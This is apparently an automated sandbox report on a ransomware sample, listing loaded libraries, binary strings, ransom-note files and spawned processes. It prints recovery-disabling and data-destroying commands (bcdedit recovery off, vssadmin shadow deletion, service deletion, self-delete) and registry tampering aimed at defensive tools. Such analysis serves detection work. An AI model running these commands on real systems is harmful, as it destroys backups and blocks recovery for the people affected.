        Source: C:\Users\user\Desktop\malware.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: malware.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: malware.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: malware.exe, 00000000.00000003.2482024738.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500906615.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502598406.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2508320820.0000000004D49000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.maloxmalox source: malware.exe, 00000000.00000003.2519245558.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2522348895.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2496475119.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2508586862.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2511621429.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.maloxl\ source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\FILE RECOVERY.txt1 source: malware.exe, 00000000.00000003.2482024738.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 696334923056ntkrnlmp.pdbDD2-7850-423A-B1D8-7882CE1A6D15.logGN source: malware.exe, 00000000.00000003.2478408892.0000000004AB1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.malox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2175625545.0000000004AB1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.malox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: prcr.pdb source: prcr.x3d.0.dr
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: malware.exe, 00000000.00000003.2191393645.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2189324109.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2185245833.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\FILE RECOVERY.txtRY.txt-86F4-D3CB9162C2DEY.txttERY.txttxt.png-white.pngECOVERY.txtgY.txt.png source: malware.exe, 00000000.00000003.2186244420.0000000004A95000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: malware.exe, 00000000.00000003.2268404890.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2208687986.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2287116859.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2223481419.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2200950278.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2245352369.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2224953867.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2241504225.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2215040679.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2243528894.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2289764990.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2228211754.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2175625545.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2250270754.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2185841452.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2238187504.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2216671107.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2247025349.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2195742049.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2269307894.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2206887797.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2191702343.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2261663956.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2254145279.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2176553456.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2281002480.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2203036218.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2265326633.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2242475973.0000000004AC9000.00000004.00000020.00020000.00000000.sdm
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.maloxlox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\FILE RECOVERY.txt source: malware.exe, 00000000.00000003.2185527738.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2217917248.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2198750453.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2221909202.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2225220813.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2196899481.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\FILE RECOVERY.txta\FILE RECOVERY.txtA93746D24D97499F6005AF34C7906F717D420F892FD6D0txttxt source: malware.exe, 00000000.00000003.2486383254.0000000004A93000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.malox source: malware.exe, 00000000.00000003.2519245558.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2496475119.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2508586862.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2511621429.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mi_exe_stub.pdb source: wct3D66.tmp.0.dr
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.malox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: #ntkrnlmp.pdb source: malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp
        Source: malware.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: malware.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: malware.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: malware.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: malware.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Persistence and Installation Behavior

        barindex
        Uses bcdedit to modify the Windows boot settings
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
        Source: malware.exeBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-path-queueC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Maintenance\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\StartUp\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Start Menu\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessories\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Start Menu\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"

        Hooking and other Techniques for Hiding and Protection

        barindex
        Creates files in the recycle bin to hide itself
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\malware.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\malware.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 3600000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 7200000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 18000000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exe TID: 7024Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\malware.exe TID: 7024Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\malware.exe TID: 7024Thread sleep time: -1800000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\malware.exe TID: 7024Thread sleep time: -3600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\malware.exe TID: 7024Thread sleep time: -7200000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\malware.exe TID: 7024Thread sleep time: -18000000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\malware.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 3600000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 7200000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeThread delayed: delay time: 18000000Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDriveJump to behavior
